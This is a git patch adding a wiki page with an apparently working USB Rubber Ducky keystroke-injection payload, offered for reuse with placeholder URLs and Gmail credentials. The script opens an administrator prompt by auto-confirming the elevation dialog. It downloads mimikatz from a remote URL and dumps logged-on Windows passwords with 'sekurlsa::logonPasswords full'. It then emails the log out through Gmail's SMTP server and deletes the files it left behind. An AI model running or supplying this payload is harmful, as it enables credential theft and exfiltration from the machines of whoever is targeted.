From 1eb3cf53c1dcd5031849588a7716f5395056435f Mon Sep 17 00:00:00 2001
From: pesce <pesce@pescetech.com>
Date: Sun, 20 Oct 2013 21:26:14 -0700
Subject: [PATCH] Created Payload   download mimikatz, grab passwords and email
 them via gmail (markdown)

---
 ...grab-passwords-and-email-them-via-gmail.md | 87 +++++++++++++++++++
 1 file changed, 87 insertions(+)
 create mode 100644 Payload---download-mimikatz,-grab-passwords-and-email-them-via-gmail.md

diff --git a/Payload---download-mimikatz,-grab-passwords-and-email-them-via-gmail.md b/Payload---download-mimikatz,-grab-passwords-and-email-them-via-gmail.md
new file mode 100644
index 0000000..a85324b
--- /dev/null
+++ b/Payload---download-mimikatz,-grab-passwords-and-email-them-via-gmail.md
@@ -0,0 +1,87 @@
+This payload:  
+1. Downloads appropriate mimikatz version via http (I used dropbox)  
+2. Opens a admin prompt  
+3. saves mimikatz log to file  
+4. emails log via gmail  
+
+
+please change these lines to something (keep the single quote):  
+'url to 32bit mimikatz.exe'  
+'url to 64bit mimikatz.exe'  
+'gmailuser', 'gmail password'  
+
+
+Sorry about the wacky delays!  
+
+
+```
+REM Author: Pesce
+REM Date: 10/20/2013
+REM Note: Thanks to all the help everyone! This is my first attempt, don't be to upset!
+REM -------------open command prompt with admin privileges
+DELAY 3000
+CONTROL ESCAPE
+DELAY 1000
+STRING cmd
+DELAY 1000
+CTRL-SHIFT ENTER
+DELAY 1000
+ALT y
+ENTER
+DELAY 300
+REM -------------download appropriate mimikatz for architecture
+STRING powershell if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url to 32bit mimikatz.exe','%TEMP%\pw.exe');  }else{ (new-object System.Net.WebClient).DownloadFile('http://url to 64bit mimikatz.exe','%TEMP%\pw.exe');}
+ENTER
+DELAY 5000
+REM -------------get the passwords and save to c:\pwlog.txt
+STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
+ENTER
+DELAY 2000
+STRING privilege::debug
+ENTER
+DELAY 1000
+STRING sekurlsa::logonPasswords full
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+DELAY 300
+STRING del %TEMP%\pw.exe
+ENTER
+DELAY 300
+REM -------------email log via gmail
+STRING powershell
+ENTER
+DELAY 300
+STRING $SMTPServer = 'smtp.gmail.com'
+ENTER
+STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+ENTER
+STRING $SMTPInfo.EnableSsl = $true
+ENTER
+STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('gmailuser', 'gmail password');
+ENTER
+STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
+ENTER
+STRING $ReportEmail.From = 'pesce@pescetech.com'
+ENTER
+STRING $ReportEmail.To.Add('pesce@pescetech.com')
+ENTER
+STRING $ReportEmail.Subject = 'Duck Report'
+ENTER
+STRING $ReportEmail.Body = 'Attached is your duck report.' 
+ENTER
+STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
+ENTER
+STRING $SMTPInfo.Send($ReportEmail)
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+REM ---------------------delete and end
+STRING del c:\pwlog.txt
+ENTER
+DELAY 300
+STRING exit
+ENTER
+```
\ No newline at end of file